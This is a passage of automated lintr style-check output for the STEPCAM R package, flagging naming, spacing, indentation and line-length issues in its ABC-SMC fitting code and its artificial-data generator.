^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:14:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n        ^~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:9:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:216:16:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:9:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:217:16:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:9:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:218:16:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:11:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:23:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:39:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L221) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = 1\n                                      ^\n```\n[R/ABC_SMC.R:223:11:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:23:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:39:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L223) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] =\n                                      ^\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:53:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:224:63:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:225:29:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, weights)\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:228:13:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L228) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:228:14:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:228:34:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:234:21:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L234) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:234:22:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:236:13:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:236:38:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:247:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:247:17:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:248:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:248:17:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:249:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:249:17:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:250:16:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:21:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:252:31:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:252:41:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:252:51:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:253:21:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                    ^~~~~~\n```\n[R/ABC_SMC.R:253:29:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                            ^~~~~~\n```\n[R/ABC_SMC.R:253:37:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                                    ^~~~~~\n```\n[R/ABC_SMC.R:254:54:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L254) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:257:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L257) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:19:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:35:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:257:51:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:258:9:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:32:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:258:37:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                                    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L261) *style:* **Commas should always have a space after.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^\n```\n[R/ABC_SMC.R:261:26:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L261) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:262:19:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:263:19:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:264:19:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:271:61:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L271) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:275:63:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:278:15:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L278) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:279:44:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L279) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix 